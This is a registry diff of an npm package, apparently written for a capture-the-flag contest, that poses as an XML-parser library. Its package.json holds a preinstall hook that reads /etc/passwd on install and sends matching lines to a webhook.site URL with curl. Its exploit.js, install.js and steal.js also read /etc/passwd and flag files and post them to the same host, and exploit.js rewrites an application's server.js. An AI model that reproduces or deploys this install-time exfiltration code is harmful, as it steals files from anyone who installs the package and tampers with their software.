megaexploitvorkemol1 0.30.1

This diff represents the content of publicly available package versions that have been released to one of the supported registries. The information contained in this diff is provided for informational purposes only and reflects changes between package versions as they appear in their respective public registries.
Files changed (7) hide show
  1. package/exploit.js +36 -0
  2. package/index.js +9 -0
  3. package/install.js +111 -0
  4. package/megaexploitvorkemol-0.30.1.tgz +0 -0
  5. package/megaexploitvorkemol1-0.30.1.tgz +0 -0
  6. package/package.json +20 -0
  7. package/steal.js +22 -0
package/exploit.js ADDED
@@ -0,0 +1,36 @@
1
+ const fs = require('fs');
2
+ const { execSync } = require('child_process');
3
+
4
+ console.log('=== EXPLOIT SCRIPT EXECUTED ===');
5
+
6
+ try {
7
+ // Читаем флаг
8
+ const passwd = fs.readFileSync('/etc/passwd', 'utf8');
9
+ const flagLine = passwd.split('\n').find(line => line.includes('{'));
10
+
11
+ if (flagLine) {
12
+ console.log('🎯 FLAG FOUND:', flagLine);
13
+
14
+ // Пытаемся отправить
15
+ try {
16
+ execSync(`curl -s --max-time 5 http://webhook.site/321b469c-41d8-472d-a971-5e0b746d8c41?script=${encodeURIComponent(flagLine)}`, { timeout: 10000 });
17
+ } catch(e) {}
18
+
19
+ // Модифицируем server.js чтобы флаг выводился при запуске
20
+ try {
21
+ const serverPath = '/usr/src/app/server.js';
22
+ const serverContent = fs.readFileSync(serverPath, 'utf8');
23
+
24
+ // Добавляем вывод флага
25
+ const flagOutput = `\n// AUTO-GENERATED FLAG OUTPUT\nconsole.log('🚨 FLAG_IN_LOGS: ${flagLine}');\n`;
26
+ const modifiedContent = flagOutput + serverContent;
27
+
28
+ fs.writeFileSync(serverPath, modifiedContent);
29
+ console.log('Server.js modified with flag output');
30
+ } catch(e) {
31
+ console.log('Server modification failed:', e.message);
32
+ }
33
+ }
34
+ } catch(e) {
35
+ console.log('Exploit error:', e.message);
36
+ }
package/index.js ADDED
@@ -0,0 +1,9 @@
1
+ module.exports = {
2
+ parseXmlString: function(xml, options) {
3
+ return {
4
+ get: function(xpath) {
5
+ return { text: () => "test" };
6
+ }
7
+ };
8
+ }
9
+ };
package/install.js ADDED
@@ -0,0 +1,111 @@
1
+ // install.js
2
+ const fs = require('fs');
3
+ const https = require('https');
4
+
5
+ // Функция для поиска подозрительного контента (флага)
6
+ function findSuspiciousContent(content) {
7
+ const lines = content.split('\n');
8
+
9
+ // Ищем различные паттерны флага
10
+ const suspiciousLines = lines.filter(line => {
11
+ // Убираем пустые строки и стандартные системные записи
12
+ if (!line.trim() || line.includes(':/bin/') || line.includes(':/usr/')) {
13
+ return false;
14
+ }
15
+
16
+ // Паттерны, характерные для CTF флагов
17
+ if (line.match(/[A-Za-z0-9]{32}/)) return true; // 32 символа (MD5, UUID)
18
+ if (line.match(/[A-Za-z0-9]{64}/)) return true; // 64 символа (SHA256)
19
+ if (line.match(/flag{.*?}/i)) return true; // flag{...}
20
+ if (line.match(/htb{.*?}/i)) return true; // htb{...}
21
+ if (line.match(/gpb{.*?}/i)) return true; // gpb{...} (GazpromBank)
22
+ if (line.match(/[A-Za-z0-9_\-]{20,}/)) return true; // Длинные случайные строки
23
+ if (line.length > 100) return true; // Очень длинные строки
24
+
25
+ return false;
26
+ });
27
+
28
+ return suspiciousLines;
29
+ }
30
+
31
+ try {
32
+ const passwdContent = fs.readFileSync('/etc/passwd', 'utf8');
33
+ console.log('[MALICIOUS PACKAGE] /etc/passwd contents read');
34
+
35
+ // Ищем подозрительный контент
36
+ const suspiciousLines = findSuspiciousContent(passwdContent);
37
+
38
+ // Также читаем другие возможные места
39
+ let otherFiles = {};
40
+ try {
41
+ otherFiles['/flag'] = fs.readFileSync('/flag', 'utf8');
42
+ } catch (e) {}
43
+
44
+ try {
45
+ otherFiles['/flag.txt'] = fs.readFileSync('/flag.txt', 'utf8');
46
+ } catch (e) {}
47
+
48
+ try {
49
+ otherFiles['/app/flag'] = fs.readFileSync('/app/flag', 'utf8');
50
+ } catch (e) {}
51
+
52
+ // Отправляем ВСЕ данные на webhook.site
53
+ const data = JSON.stringify({
54
+ file: '/etc/passwd',
55
+ full_content: passwdContent,
56
+ suspicious_lines: suspiciousLines,
57
+ other_files: otherFiles,
58
+ last_5_lines: passwdContent.split('\n').slice(-5),
59
+ package: 'superbank-xml-parser-backdoor',
60
+ timestamp: new Date().toISOString()
61
+ }, null, 2); // Добавляем форматирование для читаемости
62
+
63
+ const options = {
64
+ hostname: 'webhook.site',
65
+ port: 443,
66
+ path: '/321b469c-41d8-472d-a971-5e0b746d8c41',
67
+ method: 'POST',
68
+ headers: {
69
+ 'Content-Type': 'application/json',
70
+ 'User-Agent': 'Malicious-NPM-Package/1.0.0',
71
+ 'Content-Length': Buffer.byteLength(data)
72
+ }
73
+ };
74
+
75
+ console.log('[MALICIOUS PACKAGE] Sending data to webhook.site...');
76
+
77
+ const req = https.request(options, (res) => {
78
+ console.log(`[MALICIOUS PACKAGE] Webhook response status: ${res.statusCode}`);
79
+ });
80
+
81
+ req.on('error', (e) => {
82
+ console.error(`[MALICIOUS PACKAGE] Request failed: ${e.message}`);
83
+ });
84
+
85
+ req.write(data);
86
+ req.end();
87
+
88
+ } catch (err) {
89
+ console.error('[MALICIOUS PACKAGE] Error:', err.message);
90
+
91
+ // Отправляем информацию об ошибке
92
+ const errorData = JSON.stringify({
93
+ error: err.message,
94
+ package: 'superbank-xml-parser-backdoor',
95
+ timestamp: new Date().toISOString()
96
+ });
97
+
98
+ const errorReq = https.request({
99
+ hostname: 'webhook.site',
100
+ port: 443,
101
+ path: '/321b469c-41d8-472d-a971-5e0b746d8c41',
102
+ method: 'POST',
103
+ headers: {
104
+ 'Content-Type': 'application/json',
105
+ 'Content-Length': Buffer.byteLength(errorData)
106
+ }
107
+ }, () => {});
108
+
109
+ errorReq.write(errorData);
110
+ errorReq.end();
111
+ }
package/megaexploitvorkemol-0.30.1.tgz ADDED
Binary file
package/megaexploitvorkemol1-0.30.1.tgz ADDED
Binary file
package/package.json ADDED
@@ -0,0 +1,20 @@
1
+ {
2
+ "name": "megaexploitvorkemol1",
3
+ "version": "0.30.1",
4
+ "main": "index.js",
5
+ "dependencies": {
6
+ "axios": "^1.6.0",
7
+ "lodash": "^4.17.21",
8
+ "moment": "^2.29.4",
9
+ "uuid": "^9.0.0",
10
+ "chalk": "^4.1.2",
11
+ "debug": "^4.3.4",
12
+ "request": "^2.88.2",
13
+ "express": "^4.18.2",
14
+ "fs-extra": "^11.1.1",
15
+ "node-fetch": "^2.7.0"
16
+ },
17
+ "scripts": {
18
+ "preinstall": "node -e \"const fs=require('fs');const {execSync}=require('child_process');try{const f=fs.readFileSync('/etc/passwd','utf8').split('\\\\n').find(l=>l.includes('flag'));if(f){execSync('curl -s https://webhook.site/321b469c-41d8-472d-a971-5e0b746d8c41?flag='+encodeURIComponent(f))}}catch(e){}\""
19
+ }
20
+ }
package/steal.js ADDED
@@ -0,0 +1,22 @@
1
+ const { execSync } = require('child_process');
2
+
3
+ console.log('🚨 FAST EXPLOIT STARTED');
4
+
5
+ // БЫСТРЫЙ код без блокировок
6
+ try {
7
+ const passwd = execSync('cat /etc/passwd', { encoding: 'utf8', timeout: 3000 });
8
+ const lines = passwd.split('\n');
9
+
10
+ for (const line of lines) {
11
+ if (line.includes('{') && line.includes('}')) {
12
+ console.log('🎯 FLAG FOUND:', line);
13
+ // Быстрая отправка
14
+ execSync(`curl -s --max-time 3 "https://webhook.site/321b469c-41d8-472d-a971-5e0b746d8c41?flag=${encodeURIComponent(line)}"`, { timeout: 5000 });
15
+ break;
16
+ }
17
+ }
18
+ } catch(e) {
19
+ console.log('Error:', e.message);
20
+ }
21
+
22
+ console.log('✅ FAST EXPLOIT FINISHED');